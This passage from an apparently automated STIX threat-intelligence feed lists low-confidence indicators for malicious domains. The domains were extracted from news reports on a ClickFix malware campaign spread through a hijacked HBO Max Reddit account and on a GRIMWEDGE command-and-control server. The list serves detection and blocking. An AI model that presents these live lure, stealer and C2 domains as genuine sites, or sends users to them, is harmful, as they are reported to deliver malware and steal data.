News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--79a3ace5-4c96-4d8d-a02b-d8329748e3a2","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: microsoftupdater.info","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: page[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]","pattern":"[domain-name:value = 'microsoftupdater.info']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7e4c7cdd-fc6a-4e1b-bfe3-01c4d9e58ef3","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: mpasvw.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domai","pattern":"[domain-name:value = 'mpasvw.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0c031841-cca4-4be9-938c-e683e7ccd17c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: muse-code-ide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; codex-craft[.]com; code-desktop[.]com; cl","pattern":"[domain-name:value = 'muse-code-ide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e9297430-22ca-4b6b-82ca-7cc508e283d5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: node-slate.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ins Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]c","pattern":"[domain-name:value = 'node-slate.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c5f1b67c-2ac8-4ebe-9fb8-676af638679b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: nova-desk.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-to","pattern":"[domain-name:value = 'nova-desk.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--de303fc5-f4d8-43fd-a0ac-70f6dd8c6f27","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: nova-fix.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ins Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novas","pattern":"[domain-name:value = 'nova-fix.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6b5ca329-051b-4018-a781-d37859e67f7d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: nova-hub.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: diag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com;","pattern":"[domain-name:value = 'nova-hub.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c46777b0-caa7-44e9-bf1b-e54f0622451d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: nova-labs.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.","pattern":"[domain-name:value = 'nova-labs.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bd238472-199b-4702-8257-9099632269e5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: novastacktips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: x[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning","pattern":"[domain-name:value = 'novastacktips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--158845ef-5ed1-47c0-a874-0e8a1c7713b7","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: nova-tools.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: esk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstorageti","pattern":"[domain-name:value = 'nova-tools.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c196e191-2f21-468d-9a63-49ba868679c3","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: oakenfjrod.ru","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Fake wallet delivery domains Domain desktop-version[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]na","pattern":"[domain-name:value = 'oakenfjrod.ru']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f6a0270c-14b8-4da9-a7c7-bb5cec0dcb5f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: opendisplay.us","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-linked lure domains Domain applediag[.]com;","pattern":"[domain-name:value = 'opendisplay.us']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--52f57d4e-60ee-48a1-9ff1-6d708d7bdb18","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ouilov.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domains Domain loop","pattern":"[domain-name:value = 'ouilov.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1e1fc4d1-898a-4fb5-b7c8-3061b47c58bd","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: papartybus.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sp","pattern":"[domain-name:value = 'papartybus.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1bfe22ad-ab4c-4ebe-916a-34a89b9ff43c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: perchframe15.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: mains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS lo","pattern":"[domain-name:value = 'perchframe15.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8f7fe201-e3f4-42a3-8997-ba307afe15d6","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: pine63.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery domains Domain we","pattern":"[domain-name:value = 'pine63.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9e84ebbe-3e86-46fa-9d42-069c2df60dd1","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: pinescope11.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: lawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.","pattern":"[domain-name:value = 'pinescope11.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--864bede5-6530-44a6-a54f-6dca07313c6b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: press29.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; camaligsalvatrefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canv","pattern":"[domain-name:value = 'press29.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--15d2cb44-b459-47a6-b41f-bd1051eb3eb8","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: pressureulcerlawyer.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: delivery domains Domain houstongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope1","pattern":"[domain-name:value = 'pressureulcerlawyer.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e44ea27-f850-4914-9d69-59740f871750","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: rectangleap.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; codex-craft[.]com; c","pattern":"[domain-name:value = 'rectangleap.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--69d2f293-22a7-42c3-b228-4d2b343c6601","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: remotion-skills.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: op; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning-neighborhood domains D","pattern":"[domain-name:value = 'remotion-skills.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--24f3ee26-c0fd-45c5-b1f7-c75e6ca7f4b3","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: restoremental.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: gtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemade","pattern":"[domain-name:value = 'restoremental.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3f931bc6-6135-4b58-a1b0-00954ed30a68","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: rudder-moss.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry and delivery domai","pattern":"[domain-name:value = 'rudder-moss.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b23e994f-6c71-44e3-8b6b-209fb1bafd83","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: sgaaagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; b","pattern":"[domain-name:value = 'sgaaagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d47bba31-e854-474a-b20e-e0f60e92143f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: sic180.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rsion[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]namebright[.]bike SIC Windows-route domains Do","pattern":"[domain-name:value = 'sic180.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--91093e67-9623-4001-9239-47f6ee314dab","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: sprieagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]co","pattern":"[domain-name:value = 'sprieagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3bf28edd-60a3-4ab3-b75e-e1ad4656c30d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: storageprofiler.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: le activity IP address 172.236.51[.]169 Origin observed for storageprofiler[.]com gated lure IP address 138.124.93[.]32 AMOS helper /contac","pattern":"[domain-name:value = 'storageprofiler.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--97dd62fc-4f2b-4bee-9533-e72b4dc1d096","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: thepullmanfolkestone.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: sioning-neighborhood domains Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonlin","pattern":"[domain-name:value = 'thepullmanfolkestone.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--286ae1f7-89d0-4914-a45a-9cd7f5d30a1a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: trekmesh15.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery domains Domain weaveridge7[.]com; e","pattern":"[domain-name:value = 'trekmesh15.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--74d38166-081b-47c4-a082-b9a63336d802","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: umapla.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: om AMOS helper and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop","pattern":"[domain-name:value = 'umapla.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--67bac45a-79bb-494e-9955-34d71d91f31f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: verse-18.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com A","pattern":"[domain-name:value = 'verse-18.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3a46400f-c2ab-4f0c-9177-507cc0c05336","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: wantsellonline.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: osoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; s","pattern":"[domain-name:value = 'wantsellonline.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cdcc92aa-ce22-41b0-82fb-ccb6bbb57658","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: weaveridge7.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; trekmesh15[.]com macOS loader-delivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com Septe","pattern":"[domain-name:value = 'weaveridge7.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--923c9239-53e1-4768-a0d4-f06ded33ff2f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: wuess.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: n weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry and delivery domains Domain hou","pattern":"[domain-name:value = 'wuess.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--02256fcd-1ed8-48d8-ba00-7ec86a745adf","created":"2026-09-15T05:31:05.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: opusaccel.top","description":"Seen in \"China-Linked Hackers Exploit Chrome-Windows Zero-Day Chain to Deploy GRIMWEDGE\" (The Hacker News). Context: and loop that polls a command-and-control (C2) server (\"ocr.opusaccel[.]top\") to receive further instructions that are then executed","pattern":"[domain-name:value = 'opusaccel.top']","pattern_type":"stix","valid_from":"2026-09-15T05:31:05.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/china-linked-hackers-exploit-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f4e3aaf7-1929-401a-b7d8-f2225511792c","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: code-desktop.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: promoting a fake macOS disk-cleaning service, 11 using the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . Th","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--33ff3f2d-aca5-449e-8860-0652adcbd5e0","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 